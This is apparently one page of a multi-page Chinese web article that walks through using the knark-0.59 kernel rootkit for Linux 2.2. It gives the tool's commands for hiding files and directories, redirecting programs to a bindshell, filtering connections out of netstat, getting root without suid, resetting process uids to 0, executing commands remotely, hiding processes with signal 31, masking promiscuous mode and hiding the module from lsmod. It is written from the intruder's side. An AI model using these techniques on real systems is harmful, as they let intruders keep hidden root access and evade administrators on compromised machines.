nethide？似乎有点印象……好吧，到俺的一堆破烂里找找……咦，找到一篇knark hacking的文章，里面有提到nethide，先当下一个来玩玩吧，有个版本号为knark-0.59的，是对Linux Kernel 2.2的，行……咱们先看看这是什么样的内核模块：

除了taskhack.c之处，所有这些文件都是基于knark.o模块的正确加载。

hidef 用来隐藏你的文件或者目录，你可以建立一个目录，比如/boot/.pty0,然后键入
./hidef /boot/.pty0于是这这个目录便被隐藏起来，并且连du之类的命令也不能
找出它来，同样的，子目录下的任何文件也一样地被藏得天衣无缝 :)

ered 用来重定向执行某个程序，比如说，你把一个bindshell的程序拷到/boot/.pty0/bindshell，
然后可以用./ered /bin/ls /boot/.pty0/bindshell这样的命令，将ls重定向到bindshell，
当然，这样的话，ls是没变，但已经不能正确执行了。如果要清除所有的命令重定向，可以
键入./ered -c

nethide 用来隐藏/proc/net/tcp及/proc/net/udp里的连接进程——netstat就是从这里面获取信息并
输出的，比如你要隐藏端口43981的连接信息，你必须键入：
./nethide ":ABCD "
你就可以象grep -v一样，过滤掉你不想让人看到的网络连接信息了，比如你用：
netstat -at
可能会有一行连接(ssh)的记录是这样的：
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 localhost:ssh localhost:1023 ESTABLISHED
我们来看看/proc/net/tcp里面的情况如何:
cat /proc/net/tcp
其中相应的行应该是这样的:
local_address rem_address blablabla...
0:0100007F:0016 0100007F:03FF 01 00000000:00000000 00:00000000 00000000
如果我们想隐藏关于127.0.0.1这个IP地址的所有信息，首先就必须把它“翻译”成这种格式,127用
十六进制表示是7F，0是00，1是01，于是地址就是0100007F，然后，再跟上端口22是0016，就是：
0100007F:0016了，于是我们键入：
./nethide "0100007F:0016" 便可以将其隐藏得很漂亮了。

rootme 利用这个家伙，你可以不需要suid位，就能拿到root的权限喽:
./rootme /bin/sh
你也可以用这种方式来运行:
./rootme /bin/ls -l /root
这里必须注意，要输入完整的路径名。

taskhack 可以改变运行着的进程的uid,euid,gid,egid等。
./taskhack -alluid=0 pid
这可以把该进程所有的*uid(uid, euid, suid, fsuid)都改成0
你用：
ps aux | grep bash
creed 91 0.0 1.3 1424 824 1 S 15:31 0:00 -bash

rexec 远程执行命令，比如：
./rexec www.microsoft.com haxored.server.nu /bin/touch /LUDER

knark还有一些其它的特性：
将信号31发送给某个进程，能够在/proc里将进程文件隐藏起来，这样ps及top
都无法看到，比如：
#kill -31 pid
如果这个进程还有它的子进程，那么也将一同被隐藏起来，所以如果你把你的shell
隐藏掉的话，所有你键入的进程将都是不可见的。如果你想再看看，被隐藏起来的进
程藏在什么地方的话，可以看/proc/knark/pids文件，这里列出所有隐藏的家伙;)

闯入一个系统中，sniffer总是入侵者们用来扩大战果的玩意儿，现在也存在许多小工具
能够侦测到网卡是否被置于混杂模式，但如果你加载了这个模块，当人们在查询SIOCGIFFLAGS
的标志位时，IFF_PROMISC——接口为随机(promiscuous)模式总是会被隐藏的。

这个包中还带有另一个小工具modhide，这个模块加载后，可以将最后加载至系统中的模块从
模块列表里移除——也就是/proc/module里面看不到它，示例如下：
#/sbin/insmod knark.o
#/sbin/lsmod | grep knark
knark 6640 0 (unused)
#/sbin/insmod modhide.o
#lsmod | grep knark
啥也没有了 ;)

最重要的是，我们可以在/proc/knark/目录——当然也是隐藏的——下面找到所有被藏起来的东西的资料。

四、分析

此新闻共有4页 1 2 3 4